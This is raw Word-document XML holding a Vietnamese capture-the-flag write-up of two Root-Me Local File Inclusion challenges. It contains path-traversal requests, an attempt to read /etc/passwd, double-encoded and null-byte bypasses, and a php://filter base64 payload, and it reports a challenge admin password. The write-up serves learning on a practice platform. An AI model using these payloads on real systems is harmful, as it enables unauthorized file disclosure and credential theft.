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76769" w14:textId="3F25128D" w:rsidR="002F49FE" w:rsidRPr="00BA0E33" w:rsidRDefault="00B30B6C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA0E33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thử thách thứ 1: Local File Inclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C458836" w14:textId="6287430D" w:rsidR="00B84876" w:rsidRDefault="00B84876">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A2435D7" w14:textId="76C19809" w:rsidR="00B84876" w:rsidRDefault="00B84876">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mục tiêu là vào được trang quản trị. Để làm được điều này, mình phải có tk và mk của admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B654CB" w14:textId="32DF9B0E" w:rsidR="00B30B6C" w:rsidRDefault="00B30B6C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="474C417A" w14:textId="14E70D9C" w:rsidR="00B30B6C" w:rsidRDefault="00B84876">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mình thấy có rất nhiều file. Và chắc chắn sẽ ko tìm đc tk admin từ các file này (vì đây chắc chắn là cú lừa của bài toán)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F01DE74" w14:textId="05BFFE9B" w:rsidR="00B84876" w:rsidRDefault="00B84876">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29E54240" w14:textId="77777777" w:rsidR="00B84876" w:rsidRDefault="00B84876">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Chắc chắn nó nằm ở 1 file ẩn nào đó trong root. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31973A87" w14:textId="34E7EC76" w:rsidR="00B84876" w:rsidRDefault="00B84876">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Bài toán này có thể nhận 2 tham số: files và f </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406748C1" w14:textId="575E457A" w:rsidR="00B84876" w:rsidRDefault="00B84876">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Nếu mình resquest url sau: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B84876">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://challenge01.root-me.org/web-serveur/ch16/?files=sysadm&amp;f=index.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B84876">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nó sẽ đọc file index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569C42D1" w14:textId="08A42583" w:rsidR="00B84876" w:rsidRDefault="00B84876">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0064368D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Chắc chắn một điều files là  tên thư mục và f là tên file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3FCBB0" w14:textId="368888E8" w:rsidR="0064368D" w:rsidRDefault="0064368D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Đối với 1 bài toán có nhiều thư mục và file như vậy, khả năng cao sẽ là path traversal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF90D8A" w14:textId="23893822" w:rsidR="0064368D" w:rsidRDefault="0064368D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="623B3163" w14:textId="4634010C" w:rsidR="0064368D" w:rsidRDefault="0064368D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mình sẽ request như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54190525" w14:textId="4D3F4FEE" w:rsidR="0064368D" w:rsidRDefault="0064368D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0064368D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/web-serveur/ch16/?files=sysadm/../</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EA2ACA" w14:textId="48B858B1" w:rsidR="0064368D" w:rsidRDefault="0064368D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(Ở đây mình lưu ý chút là ../ sẽ ở sau thư mục và trước tập tin nha.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632F4DF3" w14:textId="42EE7374" w:rsidR="0064368D" w:rsidRDefault="0064368D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0064368D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thành công </w:t>
      </w:r>
      <w:r w:rsidRPr="0064368D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thư mục cha của sysadm sẽ chứa các thư mục như sysadm, reseau, espirit,..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50781217" w14:textId="45C81C26" w:rsidR="0064368D" w:rsidRDefault="0064368D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mình thử lùi về thêm 1 thư mục nữa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ECA942" w14:textId="640ADF98" w:rsidR="0064368D" w:rsidRDefault="0064368D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0064368D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kết quả là mình thấy thư mục admin </w:t>
      </w:r>
      <w:r w:rsidR="00B760D4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>và file index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1030C315" w14:textId="7F9016DB" w:rsidR="00B760D4" w:rsidRDefault="00B760D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Mình nhấp thử thì thấy </w:t>
      </w:r>
      <w:r w:rsidRPr="00B760D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="thick"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>File:admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> không hiện ra gì cả.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C9C1F9" w14:textId="7199C8E3" w:rsidR="00B760D4" w:rsidRDefault="00B760D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thì rất có thể admin chính là thư mục</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BC8F26" w14:textId="10131D87" w:rsidR="00B760D4" w:rsidRDefault="00B760D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mình sẽ thử yêu cầu url sau để truy cập file trong admin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48608023" w14:textId="1E8782C1" w:rsidR="00B760D4" w:rsidRDefault="00B760D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B760D4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>web-serveur/ch16/?files=sysadm/../../admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> thì thấy 1 file index.php khác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57515DD4" w14:textId="7312EFED" w:rsidR="00B760D4" w:rsidRDefault="00B760D4" w:rsidP="00B760D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B760D4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thành công tk là admin và pass: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B760D4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpbNJ60xYpvAQU8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388B3B0E" w14:textId="5065478D" w:rsidR="00BA0E33" w:rsidRDefault="00BA0E33" w:rsidP="00B760D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5876C04B" w14:textId="701F7695" w:rsidR="00BA0E33" w:rsidRDefault="00BA0E33" w:rsidP="00B760D4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA0E33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thử thách thứ 2: Local File Inclusion- Double Encoding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0215387B" w14:textId="03246E06" w:rsidR="00BA0E33" w:rsidRDefault="00BA0E33" w:rsidP="00B760D4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C718498" w14:textId="62FDE77E" w:rsidR="00B84876" w:rsidRDefault="00A627A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mục tiêu bài này là tìm được mk trong file nguồn của trang. Cũng là kĩ năng đọc file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A6C0C4" w14:textId="353DE7F6" w:rsidR="00A627A0" w:rsidRDefault="00A627A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22F88A28" w14:textId="6E52ECA4" w:rsidR="00A627A0" w:rsidRDefault="00A627A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bài này trước mắt cho mình đọc được 3 file là home, cv, contact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E78E0B" w14:textId="694118E8" w:rsidR="00A627A0" w:rsidRDefault="00A627A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Mình phải yêu cầu url sau: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A627A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>web-serveur/ch45/index.php?page=cv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217CB835" w14:textId="01655F1E" w:rsidR="00A627A0" w:rsidRDefault="00A627A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mình thử một đối số khác: ch45/index.php?page=/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FEA56B" w14:textId="35B88383" w:rsidR="00A627A0" w:rsidRDefault="00A627A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nó báo attack detected. Mình sẽ double encode dot  (%252E) và backslash (%252F)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0299FFDA" w14:textId="6A9A27BE" w:rsidR="00A627A0" w:rsidRDefault="005129E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nó báo rất nhiều lỗi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F39D55" w14:textId="3AE7A2A4" w:rsidR="005129E9" w:rsidRDefault="005129E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63574278" w14:textId="259DEE15" w:rsidR="005129E9" w:rsidRDefault="005129E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36C3521A" w14:textId="7E318B4E" w:rsidR="005129E9" w:rsidRDefault="005129E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DBA23B3" w14:textId="78F8674F" w:rsidR="005129E9" w:rsidRDefault="005129E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CA0475E" w14:textId="77777777" w:rsidR="005129E9" w:rsidRDefault="005129E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CFC7446" w14:textId="7C059BDC" w:rsidR="005129E9" w:rsidRDefault="005129E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E393FA1" w14:textId="50B694C9" w:rsidR="005129E9" w:rsidRDefault="005129E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005129E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>include(): open_basedir restriction in effect. File(/etc/passwd.inc.php) is not within the allowed path(s): (/challenge/web-serveur/ch45:/tmp) in &lt;b&gt;/challenge/web-serveur/ch45/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A57FD9" w14:textId="77777777" w:rsidR="00A627A0" w:rsidRDefault="00A627A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2790E1F2" w14:textId="09923127" w:rsidR="00A627A0" w:rsidRDefault="005129E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005129E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>include(/etc/passwd.inc.php): failed to open stream: Operation not permitted in &lt;b&gt;/challenge/web-serveur/ch45/index.php&lt;/b&gt; on line &lt;b&gt;7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48746BC0" w14:textId="355682A3" w:rsidR="005129E9" w:rsidRDefault="005129E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52DE718B" w14:textId="5BDEE326" w:rsidR="005129E9" w:rsidRDefault="005129E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005129E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>include(): Failed opening '/etc/passwd.inc.php' for inclusion (include_path='.:/usr/share/php') in &lt;b&gt;/challenge/web-serveur/ch45/index.php&lt;/b&gt; on line &lt;b&gt;7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BD0857" w14:textId="3EF5BBC9" w:rsidR="005129E9" w:rsidRDefault="005129E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7431E11D" w14:textId="3A443548" w:rsidR="005129E9" w:rsidRDefault="005129E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mình bắt đầu phân tích lỗi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BCECA3" w14:textId="1BCF0F1F" w:rsidR="005129E9" w:rsidRDefault="005129E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7183CCEF" w14:textId="0A4C936C" w:rsidR="005129E9" w:rsidRDefault="005129E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thử với tham số abc thì abc.inc.php mình nghĩ là ứng dụng tự thêm đuôi cho tham số</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C03B06" w14:textId="454A4C69" w:rsidR="005129E9" w:rsidRDefault="005129E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">thử tiếp với </w:t>
      </w:r>
      <w:r w:rsidRPr="005129E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cv%252Einc%252Ephp%00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> để bỏ đuôi ứng dụng tự thêm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6238BA" w14:textId="32939EEE" w:rsidR="005129E9" w:rsidRDefault="005129E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nó đã báo ít lỗi hơn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6444D2FF" w14:textId="3F5F65DD" w:rsidR="005129E9" w:rsidRDefault="005129E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D3B856" w14:textId="04B809BC" w:rsidR="005129E9" w:rsidRDefault="005129E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005129E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>include(): Failed opening 'cv.inc.php' for inclusion (include_path='.:/usr/share/php') in &lt;b&gt;/challenge/web-serveur/ch45/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235A15A4" w14:textId="51FCEBB9" w:rsidR="005129E9" w:rsidRDefault="005129E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FD8CA96" w14:textId="4160109A" w:rsidR="00D4618A" w:rsidRDefault="005129E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sau khi mình tìm hiểu lỗi này, thì hiểu là ứng dụng</w:t>
      </w:r>
      <w:r w:rsidR="00D4618A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> không cho phép null byte.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D69C01C" w14:textId="05DF0E6F" w:rsidR="00D4618A" w:rsidRDefault="00D4618A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chính xác là ứng dụng không cho phép chạy bất kì file khác trừ home,cv,contact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59396B20" w14:textId="74AE1ADC" w:rsidR="00D4618A" w:rsidRDefault="00D4618A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thứ hai nữa là bài này không có quá nhiều thư mục nên path traversal là không thể.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D1F0D5" w14:textId="77777777" w:rsidR="00D4618A" w:rsidRDefault="00D4618A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="198F9518" w14:textId="77777777" w:rsidR="00D4618A" w:rsidRDefault="00D4618A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bài này mất rất nhiều thời gian để fuzz hay tìm hiểu lỗi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CD2B55" w14:textId="77777777" w:rsidR="00D4618A" w:rsidRDefault="00D4618A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mình thấy cách khai thác cơ bản không  thành công</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4618A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> thử với php wrappers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41358E96" w14:textId="77777777" w:rsidR="00D4618A" w:rsidRDefault="00D4618A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EEC0C6B" w14:textId="564961F5" w:rsidR="005129E9" w:rsidRDefault="00D4618A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Để khai thác lfi hiệu quả , họ hay dùng php filter. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583FCD8B" w14:textId="2491E859" w:rsidR="00D4618A" w:rsidRDefault="00D4618A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rút kinh nghiệm từ các lần fuzz trc, mình sẽ chỉ thử với file cv,home thôi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8B6106" w14:textId="5A15C99E" w:rsidR="00D4618A" w:rsidRDefault="00D4618A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10E49336" w14:textId="719023A6" w:rsidR="00D4618A" w:rsidRDefault="00D4618A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload sẽ là: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B47D82" w14:textId="52F560CA" w:rsidR="0035412F" w:rsidRDefault="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/web-serveur/ch45/index.php?page=php:%252f%252ffilter%252fconvert%252ebase64-encode%252fresource=cv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8EFFD3" w14:textId="4AF8FE58" w:rsidR="0035412F" w:rsidRDefault="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D4254C1" w14:textId="604F7BC9" w:rsidR="0035412F" w:rsidRDefault="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Kết quả sẽ là chuỗi được mã hóa base-64. Thử encode ra </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CC2B30" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;?php include("conf.inc.php"); ?&gt;</w:t>
      </w:r>
    </w:p>
